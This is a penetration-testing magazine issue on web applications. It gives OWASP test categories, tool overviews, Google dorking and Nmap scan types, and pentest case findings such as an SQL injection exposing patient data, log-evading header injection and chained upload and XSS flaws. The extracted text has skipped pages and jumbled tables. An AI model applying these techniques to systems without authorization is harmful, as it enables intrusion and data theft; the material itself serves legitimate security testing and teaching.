Web Application Penetration Testing
Web Application Penetration Testing
Editor-in-Chief
Joanna Kretowicz
[email protected]
Editors:
Marta Sienicka
[email protected]
Marta Strzelec
[email protected]
Marta Ziemianowicz
[email protected]
Senior Consultant/Publisher:
Paweł Marciniak
CEO:
Joanna Kretowicz
[email protected]
Marketing Director:
Joanna Kretowicz
[email protected]
Publisher
Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Postępu 17D
Phone: 1 917 338 3631
www.eforensicsmag.com
All trademarks, trade names, or logos mentioned or used are the property of their respective owners.
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the pre-
sented techniques or consequent data loss.
word from the team
Dear readers!
Easter is coming, so brace yourselves and take a look at our brand new issue. This time Hakin9 Magazine is com-
pletely focused on Web Application Penetration Testing. Are you ready? Then let’s go!
We begin with two articles that will introduce you to the topic of Web Application Penetration Testing. If you are
a beginner and would like to understand what this is all about, then you are in the right place: first, Amit Kapoor
will introduce you to the world of Web Pentesting, and then Andrea Cavallini will take you through an overview
of Web Pentesting Tools.
After this introduction we can move to more technical and advanced articles. We start with Carlos Castro, who
will show you how to use both Google and Nmap in the scanning process. And then, in case you’ve always wanted
to learn how to use OWASP ZAP PROXY in Web Applications you will have a chance to do that - thanks to Cory
Miller, who very thoroughly described the entire subject.
In the middle of the issue we will take a small break from Web Application Penetration Testing. Samrat Das, one
of our best authors (some of you might have read his article in the previous issue), presents you with a piece on
Reverse Engineering. You definitely should read this one - it’s not your typical article, but I don’t want to spoil
the surprise!
After that we’re back to WAPT, but with a little hacking this time! How to hack with SQLmap is an article every
hacker and penetration tester should read. Sumit Kumar Soni describes step by step how to use SQLmap for
hacking. Continuing the trend, you should take a look at the article Gilles Lami prepared for more advanced read-
ers, about the most important techniques and attacks used in WAPT. Next, we have Web Applications In The
Modern World written by Hashem Ahmad - sounds mysterious, right? But don’t get fooled, this article is strictly
technical and focused on XSS.
Our last article is different than others. Courtesy of Alexandre D’Hondt & Hussein Bahmad, students of Univer-
sité Catholique de Louvain-la-Neuve, we present you their article about Understanding SCAP Through a Simple
Use Case.
And that’s it! We hope that you will enjoy this issue. Remember, we are always open for your feedback, and don’t
forget to visit our blog and social media as well.
1
Web Application
Penetration Testing
Introduction
by Amit Kapoor
They say that life is too short to make all the mistakes yourself, and that you must learn
from the experience of others. I believe that the vastness of knowledge also falls in a
similar category. You simply cannot learn everything, and must acquire the knowledge
of others. At times it is enough to refer to the masters for explanation of topics that have
already been researched thoroughly.
Web Application Penetration Testing is a topic that has been researched much, and in such great details that you
may feel it has been beaten down to death. But then again, there are a lot of us who may be coming across the
terminology for the first time.
I have referred to the Open Web Application Security Project (OWASP) web application security testing
methodology and to keep it simple, I have just talked about Web Application Testing at a very high level, and
have just highlighted the various (vast) areas that are covered by it.
While security tests are used to evaluate the integrity and security of applications and systems by means of
validation and verification, testing the security of a web application involves evaluating the inherent security of
the application.
An exhaustive security testing (though never really possible) helps expose all the loopholes (weaknesses in a
system's design, implementation, operation, or management) or technical glitches, along with the chances of
data being under a threat (by hackers and viruses due to instability) of such an application. The report thus
generated, along with a plan for risk mitigation, is shared with the creator of the web application.
For implementation of Web Application Penetration Testing, it is recommended to use and implement the
following 10 activities:
1. Information Gathering
2. Configuration and Deployment Management Testing
3. Identity Management Testing
2
4. Authentication Testing
5. Authorization Testing
6. Session Management Testing
7. Input Validation Testing
8. Error Handling
9. Business Logic Testing
10. Client Side Testing
The following sections describe very briefly the above listed activities, and the sub-activities, that
need to be conducted as part of each specific activity.
Information Gathering
Testing for Information Gathering includes the following activities:
1. Conducting Search Engine Discovery and Reconnaissance for Information Leakage
2. Fingerprinting the Web Server
3. Reviewing Webserver Metafiles for Information Leakage
4. Enumerating Applications on Webserver
5. Reviewing Webpage Comments and Metadata for Information Leakage
6. Identifying Application Entry Points
7. Mapping Execution Paths through Application
8. Fingerprinting Web Application Framework
9. Fingerprinting the Web Application
10. Mapping Application Architecture
3
8. Testing RIA cross domain policy
Authentication Testing
In terms of computer security, authentication is the process of verifying the digital identity of a
communicator, for example - the true identity of someone logging in to the system. Authentication
testing helps ensure the genuineness of a product and depends upon one or more authentication
factors. Authentication testing involves testing of/for:
1. Credentials Transported over an Encrypted Channel
2. Default Credentials
3. Weak Lock-out Mechanism
4. Bypassing Authentication Schema
5. Remember password functionality
6. Browser Cache Weakness
7. Weak Password Policy
8. Weak Security Question/Answer
9. Weak Password Change or Reset Functionalities
10. Weaker Authentication in Alternative Channel
Authorization Testing
Authorization controls the aspect of whether or not someone should be allowed to access a system.
Authorization Testing thus helps crosscheck the permissions of someone trying to log in to a system.
Because the process of authorization comes after authentication testing is successful, authorization
testing tests the directory traversal/files and also involves testing for:
1. Bypassing Authorization Schema
2. Privilege Escalation
3. Insecure Direct Object References
4
Session Management Testing
Session Management is a core activity as it is the mechanism that controls all interactions between a
user and the web-based application - from the time before logging in to what happens after logging
out. The ways in which a web application interacts with a user are dependent upon the nature of the
site, the security, and availability requirements of the application.
Refer: Whilst there are accepted best practices for application development, such as those outlined in
the OWASP Guide to Building Secure Web Applications, it is very important that application security
is considered within the realm of the requirements and expectations.
Session Management Testing covers testing for:
1. Bypassing Session Management Schema
2. Cookies Attributes
3. Session Fixation
4. Exposed Session Variables
5. Cross Site Request Forgery (CSRF)
6. Logout Functionality
7. Session Timeouts
8. Session Puzzling
5
will be interpreted by SSI mechanisms. A system is vulnerable if an attacker can inject
code into HTML pages or perform remote code execution.
9. XPath Injection Testing: This tests the possibility of injecting data into an application
so that it executes user-controlled XPath queries. A system is vulnerable if an attacker
is able to bypass authentication mechanisms or access information without proper
authorization.
10. IMAP/SMTP Injection Testing: This tests the possibility of injecting arbitrary
IMAP/SMTP commands into the mail servers.
11. Code Injection Testing: This tests the possibility of injecting data into an application
that may be executed by the web server.
12. OS Commanding Testing: This tests the possibility of injecting an OS command
through an HTTP request into the application.
13. Buffer Overflow Testing: This tests for different types of buffer overflow vulnerabilities
such as Heap overflow, Stack overflow, and Format string.
14. Incubated Vulnerability Testing: This is a complex test that needs more than one data
validation vulnerability to work.
15. Testing for HTTP Splitting/Smuggling: This describes how to test for HTTP Exploits,
such as HTTP Verb, HTTP Splitting, and HTTP Smuggling.
The goal of testing is to verify if the application actually performs validation; thus, does not trust its
input.
Error Handling
Reviewing Error Handling code assures whether or not an application fails safely under all possible
error conditions, expected or unexpected. A well-planned error/exception handling strategy is
important for three reasons:
1. It does not give attackers any information that may help in attacking the application.
2. It is easier to maintain and reduces the chance of any uncaught errors.
3. If not implemented properly, information leakage can lead to business-critical
vulnerabilities.
6
1. Test Business Logic Data Validation: This helps to verify whether or not users can
insert unauthorized data into the system/application.
2. Test Ability to Forge Requests: This helps to verify whether or not users can
submit/alter data to the system for which they are not authorized.
3. Test Integrity Checks: This helps to verify whether or not users can destroy the
integrity of any part of the system or its data.
4. Test for Process Timing: This helps to verify whether or not users can manipulate a
system/guess behavior based on input or output timing.
5. Test Number of Times a Function can be Used Limits: This helps to verify whether or
not users can use part of an application/function more than the number of times
required by the workflow.
6. Testing for the Circumvention of Work Flows: This helps to verify whether or not users
can perform actions that are out of bounds of the approved workflow.
7. Test Defenses against Application Misuse: This helps to verify whether or not users can
manipulate the application in a manner not intended.
8. Test Upload of Unexpected File Types: This helps to verify whether or not users can
upload unexpected file types that are not per the business workflow.
9. Test Upload of Malicious Files: This helps to verify whether or not users can upload
potentially malicious files to the system that may be harmful to the system security.
Client-Side Testing
Client-Side testing takes care of code execution on the client-side, usually within a web browser or
browser plugin. The execution of code on the client-side is distinct from executing on the server and
returning the subsequent content. Client-Side testing involves testing for:
1. DOM based Cross Site Scripting
2. JavaScript Execution
3. HTML Injection
4. Client-Side URL Redirect
5. CSS Injection
6. Client-Side Resource Manipulation
7. Cross Origin Resource Sharing
8. Cross-Site Flashing
9. Clickjacking
10. WebSockets
11. Web Messaging
12. Local Storage
7
Conclusion
For further in depth reading on all the areas mentioned above, I suggest you visit the Open Web
Application Security Project (OWASP) web application security testing methodology on which I have
based and created the article.
@amitwritesat and
https://in.linkedin.com/in/kapooramit
8
Web Applications Pene-
tration Testing Tools -
Overview
by Andrea Cavallini
Burp is made up of a set of tools that makes the analysis of vulnerabilities detailed and its features are:
• Proxy, which creates a stream between browser and application through a TCP socket. In this stream
we can find all HTTP and HTTPS traffic, we can modify a message and send it modified. The
analysis of the traffic allows the creation of the site mapping
• Scanner, which is a tool that checks the application for a lot of types of known vulnerabilities with
standard or customizable algorithms
• Spider, which analyses the content of web servers and can force the research of standard contents
with the crawling technic
• Intruder, which is a tool that can modify a past request captured with proxy and can use it for try
customizable exploits
• Repeater, it repeats the sending of the requests captured or created
• Sequencer, it verifies and sends the requests with fuzz strings for testing
• Comparer, it checks all the differences between two captured requests
• Decoder, it decodes parts of a message with a lot of decryption algorithms in order to get them
readable and analyzable
• Extender, it permits to use customizable scripts with command-line
I am going to introduce - in detail - the tools of Burp Suite with a simple explanation.
9
Proxy
Proxy is the first step of our analysis. It creates a TCP stream, like a man-in-the-middle vector, and
intercepts the requests from the browser to the web (the answers as well can be intercepted, in this
case from network to client). Proxy can block the requests until the pentester decides on an action.
The requests (or the answers) can be:
• forwarded (the navigation continues normally)
• denied (which means that the navigation of this specific request is interrupted)
• elaborates, with the modification of the body and the header and resent, internally to
Burp, to the other tolls in order to analyze other vulnerabilities.
The information intercepted can be filtered with specific strings or regular expressions; therefore, the
analysis is simplified.
Automatically when the traffic is intercepted, proxy begins to save the requests and elaborates the
structure of the website. This action, which is called site mapping, is useful for the analysis of the
structure of the platform.
As far as the HTTP or HTTPS traffic is concerned, there are two different ways to proceed: the
automatism with the scanner which is used at beginning of the analysis, or the personalized methods
of research always used after the study of the platform and its functionalities.
Scanner
The automatic scanning searches for the most common vulnerabilities. The initial scanning is passive
because we use the traffic that the proxy has intercepted previously (we can use the active mode but
the traffic will be increased). Finally, a report will be generated when the analysis ends. It is
exportable, analyzable, and it permits provides a first glance of our search.
If we can take a step back, the proxy memorizes the structure of the application. This action starts
from the document root, from the top down, and offers a tree view of the environment that we are
analyzing. This is useful to know, which are the pages or the functionalities (we must have access to
these resources) and we can try to exploit them. In this phase this tool can find all the subdomains,
and other domains, tied to the host with their mapping of directories and pages available.
Spider
The spider, another tool in Burp Suite, can crawl the contents of the application. This action starts
with the most common names of HTML contents, it is customizable and it works on the navigable
contents, also hidden components.
When these first steps end, after the analysis of reports and the spider results, we can start to attack
the environment with a more focus exploits. In this work, the tool called intruder will be our best
friend.
10
Intruder
The intruder is the most important tool that we can use to exploit the application. Once we have
grouped a set of requests or answers (because we cannot forget that we can intercept the answer as
well from the website to our browser) we define a part of the message. We can alter this with a string
called payload and use it for our vector attack. Now we are ready to decide the real attack algorithm
and start the analysis of zero-day vulnerabilities. At the end of this phase a report will be produced
and the results verified.
The power of intruder is the elasticity of attacks, it can change from fuzzes to dictionaries strings and
it has a lot of algorithms for our payloads.
The attacks that can be used are:
• Sniper, which uses a single set of inputs on a single parameter to test it, without
modifying the others. This mode is used typically to test the forms with two parameters,
which we know one of them
• Battering Ram, they use a single set of inputs on all parameters to test them. This mode
is used typically to test the forms with multiple fields
• Pitchfork, they use many sets of inputs
• Cluster Bomb, they use many sets of inputs to tests all the parameters in all the
combinations. This mode is used typically for the brute-forcing
Additionally, we have other tools that can be used to find vulnerabilities which are:
• repeater, it is used to elaborate a request intercepted previously by proxy and resend it,
modified or not
• sequencer, it is used typically for brute-forcing of tokens created by the application
Overview of Arachni
Arachni (http://www.arachni-scanner.com/download/) is an open source Ruby application
developed by Arachni-scanner Project. Ruby, and in general the type of implementation used for
Arachni, allows to customize the tool with new scripts.
This tool works with:
• command-line, from the bash environment
• interface, from the browser with TCP stream connection
The best behavior of this tool is the auto learning process, because it can understand - know - and
learn the components of the application for the next step of the scanning.
Arachni has modules that can be configured on starting, like xss or audit module. From the
command line the tool can return a verbose output with all operations that it preforms, and its
ending can generate a report with the summaries of the test.
11
The web interface is a simplified version of this tool, because with the browser the commands in shell
are launched without a detailed skill of the user.
Arachni has also a web browser inside that allows an attack in JavaScript as well, sections and
HTML5 scripts.
Vega scanner
This scanner executes the most important scanning actions (crawling and automatic process on
forms and links) to find all breaking points and tests them for injections. This is possible with
modules (wrote in JavaScript) that make the submitting requests, also using fuzz parameters.
Vega proxy
The intercepting proxy is a feature like Burp Suite, it can intercept requests between browser and
application with a stream TCP (like the same man-in-the-middle as Burp) and it decides through
forwarding, blocking, or modifying, and forwarding the analysis of message.
Conclusion
Burp Suite, Arachni, and Vega are three similar tools because their aim is the same, i.e. verify the
security of a web application.
Proxy can help the pentester to exploit, trying to find particular pages or features with possible
injections. This should be possible with the pentester’s experience because the way to exploit
application is hard.
Arachni is important for the first steps, this because the scanner is fast. Vega and Burp Suite are
important to analyze particular injections. If we consider that these tools are included in all
distributions for WAPT, we can define them with a single word: essentials.
12
ABOUT THE AUTHOR:
13
Web Application Penetration
Testing – Beyond Standard
Tests
Watching TV, gathering information, interacting with friends and family or buying
groceries: the internet gains more and more functionality by the day. Putting a new
service on the web becomes easier every day with simple scripting languages, such as
PHP and JavaScript, as well as content management systems (CMS) that provide all the
basic functionality. Given these possibilities only one question remains: are they safe to
use?
What makes web applications difficult to secure is that an attacker can attack the target on several layers, the
operating system, the web server, the executing engine, the application and possibly the transport encryption.
So, in theory, and depending on the threat model, one has to secure every OSI layer by itself. And shutting
everybody out is not possible as this would reduce the functionality of the web application to zero. This dilemma
is then solved by making compromises. An example would be supporting ciphers in cipher block chaining mode
(CBC). There are known attacks on encryption algorithms using this mode, so from the security perspective, they
should not be allowed. Ciphers without known attacks on them are only present in TLS 1.2, a soon 8 year old
standard, which is still not supported by all currently used browsers, e.g. IE 10, and the browser in Android 4.4
has it disabled by default, older browsers do not support it at all. Such compromises should be avoided and,
luckily, there are many tools present that detect outdated software and insecure configurations, such as Nessus
Vulnerability Scanner1 or OpenVAS2. There are even tools that attempt to test web applications for common
vulnerabilities, such as Acunetix3 or w3af4. But especially in the latter case, penetration testing web applications,
much like in the game Go, programs are still easily beaten by skilled humans. In the following article we present
the process on how to thoroughly test web applications.
Before starting a penetration test, it is important to collect as much information as possible about the target. This
includes details about the network architecture, e.g. are load balancers, (web application) firewalls or reverse
proxies in place, can the application be found under different URLs and possibly the operating system (OS), web
server and framework name and version.
Then, the first step of a web application penetration test should always include a test of the underlying
architecture. The OS, the web server and the used framework to run the web application should be checked for
known vulnerabilities and possible security misconfigurations. In terms of the current OWASP Top 10 from
14
2013, this covers A9 – Using Components with Known Vulnerabilities and parts of A5 – Security
Misconfigurations. This part can be automated using a range of tools. Comparing a found version
string against a list of version strings with known vulnerabilities is a task a computer is really good at
and much faster than a human being.
When the basics are covered, or while some tool is checking the basics, a site map of the web
application is needed. This process is also called “Spidering”, which means to follow every link on a
site to identify the general functionality of the application as well as to discover points of interest, e.g.
web forms. This is a task where tool support is readily available, e.g. WebScarab5 or Dirbuster6. It is
important that the tools are properly configured, as e.g. hitting a “Logout” link might severely change
the outcome or crawling linked sites that belong to other domains might even have legal
consequences.
Once the tester is confident that he has found every point of interest, the actual testing of the
application’s functionality starts. These tests are usually carried out one functionality after another,
e.g. completely test the login form before moving on to the contact form.
Finding parameters
Testing a single functionality follows the same principle as the whole penetration test: First, one has
to gather all the information possible and then use that information in the test. In the case of a single
form, this means to identify all the parameters that could be used to interact with the web
application. In our experience, it is especially for more experienced testers more often than not the
case that a parameter is not found than that the identified parameters are tested incompletely. Of
course, every tester will remember to check all form parameters for injection, SQL, HTML (including
Cross-Site Scripting, XSS for short) or otherwise, as most of them are revealed by simple fuzzing7.
Others are not that widely known and some which are often forgotten are listed in the following.
HTTP parameters: A first additional parameter can be found in the HTTP method with which a
form is submitted as GET, POST and PUT. This may lead to different results. Intercepting proxies
might offer the functionality to quickly change the method with which the request is sent to the
server.
Then, the rest of the request header can be included into the set of parameters. Cookies are often a
parameter that is not checked for SQL injection, but also, other headers might be parsed by the
application and not be properly escaped. One of the parameters most often forgotten is the URL. The
15
current URL is often included into the HTML that is returned back to the client which again makes it
a potential delivery method for XSS attacks. An online shop might perhaps use URLs in the form of
“www.online-shop.com/products/books/123456” and include that URL in the response body, but the
“/books” part is only there for user guidance and the product is identified only by the trailing ID.
Therefore, replacing “books” by any JavaScript code might actually lead to the code being executed in
the client’s browser.
Forms: The most attractive version of forms are file uploads. To be given the possibility to put
chosen content on the server is a penetration tester’s dream. In a best case scenario, uploaded code
can be executed and the system can be fully compromised. Usually, one has to determine what files
can be uploaded, how they are stored and if and how they are processed on the server. A website with
image upload capabilities might, for example, enforce the file type by checking the file extension, but
not check the content for a matching file type header. In the case of JPG, the server had to check if
the file starts with the following two bytes “\FF\D8”. This would allow an attacker to upload
arbitrary files as long as the last few characters of the file name match. Uploading files provides a
number of parameters: the file name, its size and content, the file type one specifies in the request
when uploading it and how it is stored on the server (think file system or database).
Of course, file uploads and more general forms on the website are planned interaction points, so they
tend to be covered security-wise by the developers.
Guessable parameters: A tester should look further than forms. For example, hidden
functionality. As programmers try to name functions concise and logically, a function named
“addUser” might indicate that a function named “editUser” exists. The same applies to REST-APIs
where “POST” is allowed to create a user on the “/user” route, “PUT” and “DELETE” might be
allowed on “/user/<ID>”. Another vulnerable spot of web applications are plugins of the used CMS.
As they are exposed to less scrutiny, software bugs are more likely to be found there. The names of
the used plugins can usually be found in the HTML, some CSS files or the included JavaScript files.
Of course, the retrieval of information has to be tested, too. Being able to access personal information
of another user is a severe defect in a web application. These are often linked to a user ID, which
should by now already be on the list of parameters to play with. Can the ID be guessed or calculated?
Easily guessable IDs are sequential integers. Calculations might be based on the current time or a
weak random function, e.g. Java’s “java.util.Random” class where all future values can be calculated
after knowing two generated numbers in sequence8.
Testing parameters
After enumerating all parameters, the tests can finally start. As mentioned above, the first tests will
probably be checking all form fields for injection by fuzzing. Fuzzing also reveals the range of legal
values. This can then be used to further improve sample attacks that exploit potential flaws. Testing a
web application is difficult as each one is different. This is where a tester’s experience and
background really shine.
16
Programming experience might give useful insights. Imagining how a certain behaviour of an
application could be reflected in source code might help finding security holes. A famous example for
this is “Drupalgeddon”9, where a security firm figured out that by passing an array instead of a single
variable to the application, one could circumvent the SQL injection filters and therefore, execute
arbitrary SQL code.
Experience with data formats can give new insights. An XML parser of a SOAP API that processes
external entities might leak information. There is no general advice on how to proceed, as each
application is different and has to be tested on its own. One has to just work through the data the
application offers and evaluate it for potential risk factors.
Interesting findings
However, this section gives a handful of examples to give penetration testers some hints on how to
think, where to look, and what to dig for.
A recent interesting finding was the deserialization of PHP objects in the “User-Agent” header in
Joomla, a CMS based on PHP. Due to not properly handling user input, it was possible to gain
remote code execution via a serialised PHP object that was injected in the “User-Agent” header. The
attack was later improved by moving the attack code to the “X-Forwarded-For” header, as this makes
it invisible to standard Apache logs. Keeping in mind that the vulnerability was only detected by
looking at server logs, this is a huge improvement.
While auditing a patient data administration platform in use at several healthcare organisations in
Europe, we discovered an SQL injection in the session cookie before authentication. Using this flaw,
we were able to access all the patient data and to dump the password hash of the administrative user.
Lucky for us, the passwords were hashed using SHA1, which allowed a fairly fast brute-force attack
on the hash. This led to the complete compromise of the system.
In another penetration test, Oneconsult found a custom web server implementation. The scope was
then extended to include a security code review of the web server. The source code revealed a buffer
overflow in the argument collection. When a variable was provided twice, once as a regular variable,
once as an array, the buffer length was calculated using the length of the first variable. Exploiting this
overflow remote code execution was achieved.
A security code review is a really powerful tool, in general. The tester gains perfect information and
can analyse the application’s behaviour on any input. When auditing an application based on open
17
source software, e.g. WordPress (especially the plugins), this can be a great addition to a test-based
audit. Security code reviews take up a considerable amount of resources when done correctly, so
some planning is required.
Macro in CSV
While auditing a web application that provides file upload capabilities, our team discovered that a)
CSV files can be uploaded and b) the file will be evaluated by the server. This validated the following
request to be sent to the server:
The highlighted string translates to “cmd /C calc.exe” and was executed on the server.
Aggregation of findings
Sometimes, several smaller findings can be combined to create a more serious vulnerability. One
good example would be the “Magento” Remote Code Execution vulnerability that was discovered in
January 201510. A similar case, where small vulnerabilities could be combined to something larger,
was discovered in one of our audits. The website allowed users to upload their job application,
including profile picture and CV. This platform had three flaws that could be combined to imitate the
login form or distribute malware through a legitimate URL.
The first thing was that the content-type of an image could be changed to any value. Combining this
with the fact that the content was not checked, any file could be uploaded to the server having any
content-type. The second thing we discovered was that account pictures of other users could be
accessed as long as they were logged in. This is obviously bad for privacy reasons. But you, as an
attacker, can send a link to your modified profile picture to any other person. The third vulnerability
that was discovered was a persistent XSS in the profile page, which could only be used to include
sources from the same page as opposed to sources from anywhere on the internet. Combining these
three security flaws will allow the attacker to distribute the link to his application page to anybody on
the internet hiding malware in the profile picture that will be accessed as soon as the victim clicks on
the link due to the XSS vulnerability.
Conclusion
This article showed that web applications are difficult to build and operate securely as so many
details have to be considered and properly addressed. As a penetration tester, the same statement is
true. So many details have to be considered and be properly tested. Experience and the constant
18
thrive to evolve, as the attacks do, is needed to be an asset to a client. Careful development and
deployment of a web application are important steps in securing it against outside threats.
Penetration tests are helpful to bring a distinct perspective to the development and deployment team
and to improve security awareness.
19
REFERENCES:
1. Nessus:
https://www.tenable.com/products/nessus-vulnerability-scann
er
2. OpenVAS: http://www.openvas.org
3. Accunetix WVS:
https://www.acunetix.com/vulnerability-scanner/
4. w3af: http://w3af.org/
9. Official description:
https://www.drupal.org/SA-CORE-2014-005
20
SCANNING WEAKNESSES WITH GOO-
GLE AND NMAP
INTRODUCTION TO SCANNING PHASE
AND TIPS ON GOOGLE AND NMAP US-
AGE
by Carlos Castro
In this introductory article, there is a description of what should be done at the scanning
phase of an investigation and how to use a search engine like Google, and a utility like
NMap, to help discover a system´s vulnerability. The approach that uses Google’s search
engine will show how some vulnerable systems could be found with a combination of
search operators. Furthermore, the NMap section will show how to check the
vulnerabilities of a specific target.
INTRODUCTION
Regardless of what is motivating the scanning work, a good previous plan will always reduce the risk of wasting
time; so plan, think about risks, set the tools around, because as United States President Dwight Eisenhower
said, “Plans are nothing; planning is everything”. Try to think of what could occur during the job, simulate in
your mind what could happen, the possible surprises, and how you can react to each one.
The preliminary investigation should also produce a plan and notes that can be quickly accessed during the
scanning work. Things you have already discovered about the target, cautions and protective measures to be
taken during the scan, the strategy that seems appropriate, and the techniques that will be used must be at hand.
21
SCANNING OBJECTIVES
The main objective of the scanning work is to produce a weaknesses report of the target. That report
will be used on the following exploiting phase. The previous step showed what baskets to score
during the scan, trying to answer questions like: What are the active hosts in the domain? What is
the network topology? With this initial information the scan work will be more focused on getting the
details of where to force the entrance.
The scan work can also be divided in two phases. The first one, where the most obvious and
unbelievable weaknesses can be found by a search mechanism like Google, and the second, where
possible exploit places can be found by a tool like NMap. In summary, Google could be the first filter
that gives the clue of something that should be better investigated using a scanning system tool like
NMap.
Some information is naturally opened on the internet, but others could be inadvertently opened and
Google, or other search engines, can help find them. This kind of search possibilities can make
OSINT (Open Source Intelligence) viable because the information will be public, updated, and
reliable. The relation between people and companies could reveal a good weakness to exploit.
There are some good tools to have on your desktop. Some to confirm, or find more information
about, the IP or DNS name already identified.
Name Objective
Returns the DNS information associated with a DNS name and who is the owner of this domain
name
WHOIS
Others to make the job easier, by relating to more complex information from different sources.
Name Objective
Searches and retrieves information from public sources and shows graphically the relation between
MALTEGO them.
Has the ability to group different information (personal, geographic, etc.) from various sources
I2 making its analysis easier and meaningful.
22
The Google search engine has many operators that when well used, help find exactly what one has
been looked for. Below, there are examples of how it can be used (ignore the quotation marks). This
kind of research is called Google Hacking.
Google hacking, during the exploit phase, can find the weakness that careless ones have; it really still
Operator Objective
Ex: “site:microsoft.com -technet +Linux”, only returns pages from “Microsoft.com” that
site:address
have the word “Linux” and do not have the word “technet”.
Ex: “site:microsoft.com inurl:file”, will return pages from Microsoft.com that have the word
inurl:word “file” inside the URL like this: “https://msdn.microsoft.com/pt-br/library/system.io.file
%28v=vs.110%29.aspx”
Returns pages that have in the URL a specific “word” as the extension of a file.
Ex: “site:microsoft.com ext:pdf inurl:tutorial”, will return pages that reference PDF files,
filetype:word inside Microsoft’s website, that have the word “tutorial” inside the URL, like below.
or http://research.microsoft.com/en-us/um/people/simonpj/papers/haskell-tutorial/
ext:word TasteOfHaskell.pdf
exists. Other examples of Google query operators usage can be found in a repository, called GHDB
(Google Hacking Database) .
Figure 1: Sheet found in a governmental site that could be directly opened from its URL
Another interesting tool that Google offers is alerts where some search robots can be created to send
e-mails when one search returns results. All available operators can be used in the alert definition.
23
A LITTLE ABOUT TCP/IP ADDRESS AND PORTS
(SOCKETS)
The internet is the field where the game of scanning will be played, so as TCP/IP is its
communication protocol, it is a good idea to understand some concepts about it. TCP/IP is a set of
protocols and tools that control communication between devices (computers) connected to the
network; additionally, guaranteeing sections and the deliverance of all packages transmitted between
them. If the information arrives corrupted, TCP is prepared to manage the retransmission process by
itself.
Another important feature is the usage of sockets to implement multiple sessions with virtual
connections to applications. A socket is identified by an IP address and a port number, it is like a
connector to the application, a place through which information arrives or will be sent. For example,
a web server like Apache, that implements HTTP uses the port 80 to receive requests for web pages.
Any application or high level protocol uses a specific port, an FTP server uses port 21, TelNet uses 23,
HTTPS (HTTP Secure) uses 443, SQLServer uses 1433, all of them restricted by the high limit of
65535, and the already reserved application numbers. Some applications may use a different port
number to provide a high protocol service that already uses a known default port. For example, a web
server can provide pages through HTTP using another port like 8081. In that case, to connect to this
service by using a not default port, it is necessary to explicitly give the port number prefixed by “:”
(ex: http://site.com:8081).
It is important to know about sockets, because when NMAP scans for vulnerabilities it looks for ports
that can be viewed outside the organization network border. At the fifth layer of the OSI Model,
called Session, programs establish sessions using sockets. As a conclusion, sockets could be the
possible weakness, and to reduce the risk of invasions, should not be exposed to the internet,
remaining protected by a firewall.
Figure 2: TCP protocol stack and its high level protocols (HTTP, FTP …)
24
download from nmap.org. NMap has a lot of scan options and it is important to know which to use
according to the characteristics of each target.
SYN Scan → This “synchronize” initials should already be seen associated as DDos´ attack style
called SynFlood, where the objective is to make the server run out of the resources used to answer
the requests. During a normal TCP communication procedure, the client sends a SYN, the server
answers with a SYN-ACK (acknowledge), and the client answers back with an ACK. The attacker
sends as many SYN packages as possible, receives the SYN-ACK, but does not send back the ACK so
that the server remains waiting for this ACK for enough time to run out of resources. During the scan
process, NMAP does not want to put the target in trouble, but uses this mechanism to deduct that: if
the server answers with a SYN-ACK the socket is alive, if the answer is a RST (reset) the socket is not
responding, and if the server does not answer the socket is filtered.
TCP Scan → When user does not have privileges to send raw packages, NMap uses the operational
system connect system call to establish the connection.
UDP Scan → While some websites do not pay attention to protecting UDP sockets, it is a good
scanning option. NMap will send a UDP packet for every socket on the target, and due to its high
response time, this method could run for a long time.
ACK Scan → This type of scan is a good choice to identify filtered and unfiltered ports, because the
simplest package filter will let ACK Packages pass.
Fragment Packages Scan → The objective of this technique is to make the identification of what
kind of package is traveling to the network harder. For that, package filters and intrusion detectors
will let the packages generated by NMap pass, allowing the discovery of more network details. To
perform it, the header of the IP package is split, by default, across several packages of 8 bytes each.
25
Operator Objective
Figure 4: Example of scan result with FTP Server started and stopped
The example above shows the comparison of two scan results. In the first result, when the FTP Server
was started, NMap identified the TCP port 21 as opened. In the second one, when the FTP Server was
stopped, NMap identified the port 21 as filtered because it did not respond. The command used
restricts the scan to ports 21, 23 and 80 (-p T:21,23,80), using the TCP type scan (-sT).
26
Figure 5: Example of topology graphic and server characteristics
CONCLUSION
This article is a brief introduction to basic scan technics and presents the first steps to begin the
research and study. There is a lot of information on the internet and some tools already prepared for
scan purposes like Kali. Kali is a Linux environment configured for pen test with many tools to
perform a variety of scan types that you can freely download. Good luck.
27
ABOUT THE AUTOR:
REFERENCES:
• http://hackersforcharity.org/ghdb/
• http://nmap.org
28
HOW TO USE OWASP ZAP
PROXY
FOR PEN TESTING WEB BASED
APPLICATIONS
by Cory Miller
The Open Web Application Security Project (OWASP) releases the top ten vulnerabilities found
in web applications every year. Some of the items on the list are Cross-Site Scripting (XSS),
SQL Injections, and Cross-Site Forgery(CSRF). These vulnerabilities continue to plague our
web applications today. In order to protect against these vulnerabilities, Penetration Testers
rely on tools which provide automated testing on web applications. To gain better visibility
into web applications, a Penetration Tester can leverage the OWASP Zed Attack Proxy (ZAP).
INTRODUCTION
In today’s digital world, there are many different types of businesses that are accessible from the internet. Some
of these business can involve e-commerce, marketing and banking. Whether we use the internet for making a
purchase or for banking every time we access a website our browsers interact with an application hosted on a
web server. There are many working parts that happen behind the scenes. In addition, those sites are not just
used by everyday people, they can also be used by hackers or criminals looking to exploit flaws that might be
29
present within the web application. Such vulnerabilities could potentially allow an attacker to gain
access to the system, potentially exposing private data.
OWASP Zed Attack Proxy (ZAP) is an easy to use penetration testing tool that can scan for
vulnerabilities. Just like its counterpart Burp Suite, ZAP is helpful in performing detailed analysis of
web applications. ZAP is a popular tool among Penetration Testers because it has a lot of support and
is integrated into the OWASP community. In this article we will focus on how we can leverage ZAP to
scan a website for vulnerabilities, some of the features, and attempt to reproduce a Cross-site
Scripting attack (XSS).
Before we begin diving into the features and use case examples, we will take a look at some of the
benefits to using ZAP and what other open source and commercial tools are available. One of the
most comparable tools is Burp Suite. Burp Suite offers both a free and subscription based version. In
regards to OWASP ZAP, Burp Suite is very similar as to the features it includes, such as a having
spider and fuzzing capabilities, and also offers proxy functionality which has proven to be very useful
when looking at the responses between the browser and web application. It is my opinion that ZAP is
a little more user friendly for beginners, solely based on the fact that you can use the ZAP intuitive
